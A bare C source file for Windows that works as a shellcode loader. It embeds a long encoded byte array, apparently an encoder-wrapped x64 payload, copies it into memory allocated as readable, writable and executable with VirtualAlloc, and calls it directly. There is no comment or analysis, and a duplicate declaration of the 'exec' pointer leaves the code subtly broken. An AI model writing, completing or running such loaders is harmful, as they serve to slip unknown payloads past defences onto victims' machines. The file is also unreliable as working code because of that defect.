#include <windows.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>


int main() {
    unsigned char buf[] =
            "\x48\x31\xc9\x48\x81\xe9\xb8\xff\xff\xff\x48\x8d\x05\xef"
            "\xff\xff\xff\x48\xbb\x11\x2e\x5c\xd6\xcb\xf0\xb1\xf6\x48"
            "\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xed\x66\xdf"
            "\x32\x3b\x18\x7d\xf6\x11\x2e\x1d\x87\x8a\xa0\xe3\xa7\x59"
            "\x1f\x8e\x80\xae\xb8\x3a\xa4\x71\x66\xd7\x84\xd3\xb8\x3a"
            "\xa4\x31\x66\xd7\xa4\x9b\xb8\xbe\x41\x5b\x64\x11\xe7\x02"
            "\xb8\x80\x36\xbd\x12\x3d\xaa\xc9\xdc\x91\xb7\xd0\xe7\x51"
            "\x97\xca\x31\x53\x1b\x43\x66\xd7\x84\xeb\xb1\xe0\x7d\x53"
            "\x12\x14\xd7\x1b\x96\x30\x8e\x09\x25\x5e\xd9\x4e\x82\xb1"
            "\xf6\x11\xa5\xdc\x5e\xcb\xf0\xb1\xbe\x94\xee\x28\xb1\x83"
            "\xf1\x61\xa6\x9a\x66\x44\x92\x40\xb0\x91\xbf\x10\xfe\xbf"
            "\x80\x83\x0f\x78\xb7\x9a\x1a\xd4\x9b\xfa\x39\xf9\xf7\xc7"
            "\x66\x6d\x16\x8a\x31\x78\xfb\xbd\x6f\x5d\x17\xf3\x10\xc4"
            "\x07\x5d\x2d\x10\xf2\xc3\xb5\x88\x27\x64\xf6\x04\x92\x40"
            "\xb0\x95\xbf\x10\xfe\x3a\x97\x40\xfc\xf9\xb2\x9a\x6e\x40"
            "\x9f\xca\x20\xf0\x7d\x15\xa6\x14\xd7\x1b\xb1\xe9\xb7\x49"
            "\x70\x05\x8c\x8a\xa8\xf0\xaf\x50\x74\x14\x55\x27\xd0\xf0"
            "\xa4\xee\xce\x04\x97\x92\xaa\xf9\x7d\x03\xc7\x17\x29\x34"
            "\x0f\xec\xbe\x20\xf5\x0f\x9f\x75\x87\xd8\x98\x78\x40\x39"
            "\xa2\xcb\xb1\xe7\xbe\x98\xcf\x15\x11\x09\xbc\xc6\xd0\x16"
            "\xd1\x89\x85\x98\xb8\x38\x17\x42\x74\x11\xe7\x0b\xbd\x80"
            "\x3f\x42\x7d\x15\x6c\xf1\xa6\xc8\x51\x11\x2e\x5c\xd6\x34"
            "\x25\x59\xfc\x11\x2e\x5c\xe7\xf9\xc7\x9f\xc6\x3f\x1e\x72"
            "\xe7\xcb\xaa\xf9\x7f\xd0\x67\x9b\x16\x9b\xf0\xb1\xf6\x5c"
            "\x1f\x95\x85\x98\x9a\xb2\xa5\x58\x94\x0b\x5f\x54\x36\xb1"
            "\xf6\x11\x2e\xa3\x03\x23\xc6\xb1\xf6\x11\x01\x1d\xe3\xac"
            "\xc4\x9c\xa6\x54\x74\x35\xb8\xa1\xa1\xc3\xb8\x56\x5b\x28"
            "\xbf\xa2\x8a\xe0\xa7\x59\x1b\x0c\xb2\x86\xa1\xfa\x80\x44"
            "\x71\x15\x9b\x99\xa3\xe4\xb9\x47\x7b\x1e\xe7\xb9\x83\xff"
            "\xb0\x76\x67\x36\x9d\xf2\x97\xb1\xbe\x98\xef\x0f\x8c\x8a"
            "\xa8\xfc\xc7\xd8\x7d\x14\x6e\xcb\xf2\x99\x72\x11\x2e\x5c"
            "\xd6\x9b\xa3\xe2\xbf\xd6\xec\xb7\x83\xe5\xcb\x4e\x23\x59"
            "\xa7\x9a\xbc\xc1\xaf\xe2\xac\x59\xa7\xad\x9b\xfa\x39\xfc"
            "\xc7\xd8\x7d\x0f\x9f\x0c\x32\x9c\xf0\x09\x55\xa3\x03\x4e"
            "\x30\xc4\xe9\x59\xe9\x9d\x5e\xd8\xf0\xb1\xbf\xab\x6a\xac"
            "\xe3\x2b\xf0\xb1\xf6\x11\xd1\x89\x9e\x34\x3f\xc5\xf4\xfa"
            "\xe2\xb4\x83\xcb\xf0\xb1\xa5\x48\x44\x1c\x8c\x82\x79\x60"
            "\x37\xf3\x3e\x15\x11\x0b\xf0\xa1\xf6\x11\x67\xe6\x8e\x6f"
            "\xa3\x54\xf6\x11\x2e\x5c\x29\x1e\xb8\x22\xa5\x42\x66\xd5"
            "\x31\x83\x79\x40\xbe\x98\xf4\x15\x11\x0b\xf0\x91\xf6\x11"
            "\x67\xd5\x2f\x82\x4a\xa3\x60\x98\xcc\x5c\xd6\xcb\xf0\x4e"
            "\x23\x59\xad\x98\xf6\x4e\x30\xc5\x44\x77\xa5\x5b\x9e\xca"
            "\x33\x34\x36\x64\xfc\x04\x15\x93\x9a\xb1\xaf\x58\xe9\x9e"
            "\x26\x7e\x52\xe7\x09\xc4\x2e\x5c\xd6\xcb\xf0\xb1\xf6";


    void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
   void* exec;
    memcpy(exec, buf, sizeof buf);
    ((void(*)())exec)();
    return 0;
}


